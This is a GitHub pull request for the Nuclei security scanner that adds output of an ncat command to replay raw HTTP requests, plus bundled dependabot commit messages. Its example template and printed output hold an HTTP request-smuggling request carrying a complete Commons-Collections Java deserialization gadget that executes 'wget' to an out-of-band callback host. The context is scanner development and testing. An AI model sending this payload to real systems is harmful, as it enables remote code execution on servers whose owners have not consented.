Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add ncat command to replicate raw request #5243

Open
wants to merge 33 commits into
base: dev
Choose a base branch
from

Conversation

cn-kali-team
Copy link
Contributor

@cn-kali-team cn-kali-team commented May 31, 2024

Proposed changes

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

Template:

id: test

info:
  name: Ncat Command Test
  author: x
  severity: high
  description: |
    Ncat Command Test Template
  metadata:
    verified: true
    max-request: 1
  tags: raw

http:
  - raw:
      - |+
        GET /test1 HTTP/1.1
        Host: 192.168.83.196:8081
        Content-Length: 42
        Transfer-Encoding: chunked

        0
        
        GET /test1 HTTP/1.1
        Host: 192.168.83.196:8081
        X: GET http://192.168.83.1:8080/admin.jsp HTTP/1.0

        {{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "raw")}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c'

Test Run:

go run cmd/nuclei/main.go --duc -t /home/kali-team/test.yaml -u http://127.0.0.1:9015 -irr -j | jq -r '."curl-command"'

Output

printf 'GET /test1 HTTP/1.1\r\n'\
'Host: 192.168.83.196:8081\r\n'\
'Content-Length: 42\r\n'\
'Transfer-Encoding: chunked\r\n'\
'\r\n'\
'0\r\n'\
'\r\n'\
'GET /test1 HTTP/1.1\r\n'\
'Host: 192.168.83.196:8081\r\n'\
'X: GET http://192.168.83.1:8080/admin.jsp HTTP/1.0\r\n'\
'\r\n'\
'\u00ac\u00ed\x00\x05sr\x00\x11java.util.HashSet\u00baD\u0085\u0095\u0096\u00b8\u00b74\x03\x00\x00xpw\f\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\u008a\u00ad\u00d2\u009b9\u00c1\x1f\u00db\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00&https://github.com/joaomatosf/jexboss sr\x00*org.apache.commons.collections.map.LazyMapn\u00e5\u0094\u0082\u009ey\x10\u0094\x03\x00\x01L\x00\afactoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\u00c7\u0097\u00ec(z\u0097\x04\x02\x00\x01[\x00\riTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\u00bdV*\u00f1\u00d84\x18\u0099\x02\x00\x00xp\x00\x00\x00\x05sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\u0090\x11A\x02\u00b1\u0094\x02\x00\x01L\x00\tiConstantq\x00~\x00\x03xpvr\x00\x11java.lang.Runtime\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\u0087\u00e8\u00ffk{|\u00ce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\viMethodNamet\x00\x12Ljava/lang/String;[\x00\viParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\u0090\u00ceX\u009f\x10s)l\x02\x00\x00xp\x00\x00\x00\x02t\x00\ngetRuntimeur\x00\x12[Ljava.lang.Class;\u00ab\x16\u00d7\u00ae\u00cb\u00cdZ\u0099\x02\x00\x00xp\x00\x00\x00\x00t\x00\tgetMethoduq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.String\u00a0\u00f0\u00a48z;\u00b3B\x02\x00\x00xpvq\x00~\x00\x1bsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02puq\x00~\x00\x18\x00\x00\x00\x00t\x00\x06invokeuq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.Object\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpvq\x00~\x00\x18sq\x00~\x00\x13ur\x00\x13[Ljava.lang.String;\u00ad\u00d2V\u00e7\u00e9\x1d{G\x02\x00\x00xp\x00\x00\x00\x01t\x007wget http://cpcpj9usep53a5glte30tsb9pq3isa1e8.oast.livet\x00\x04execuq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00 sq\x00~\x00\x0fsr\x00\x11java.lang.Integer\x12\u00e2\u00a0\u00a4\u00f7\u0081\u00878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\u0086\u00ac\u0095\x1d\v\u0094\u00e0\u008b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\a\u00da\u00c1\u00c3\x16`\u00d1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\x00w\b\x00\x00\x00\x10\x00\x00\x00\x00xxx\r\n'\
'\r\n'\
'\r\n'\
|ncat 127.0.0.1 9015

ehsandeep and others added 30 commits October 20, 2023 11:57
…ctdiscovery#4252)

Bumps [github.com/gin-gonic/gin](https://github.com/gin-gonic/gin) from 1.9.0 to 1.9.1.
- [Release notes](https://github.com/gin-gonic/gin/releases)
- [Changelog](https://github.com/gin-gonic/gin/blob/master/CHANGELOG.md)
- [Commits](gin-gonic/gin@v1.9.0...v1.9.1)

---
updated-dependencies:
- dependency-name: github.com/gin-gonic/gin
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Bumps [github.com/docker/docker](https://github.com/docker/docker) from 24.0.5+incompatible to 24.0.7+incompatible.
- [Release notes](https://github.com/docker/docker/releases)
- [Commits](moby/moby@v24.0.5...v24.0.7)

---
updated-dependencies:
- dependency-name: github.com/docker/docker
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
@GeorginaReeder
Copy link

Thanks for your contribution @cn-kali-team , we appreciate it!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants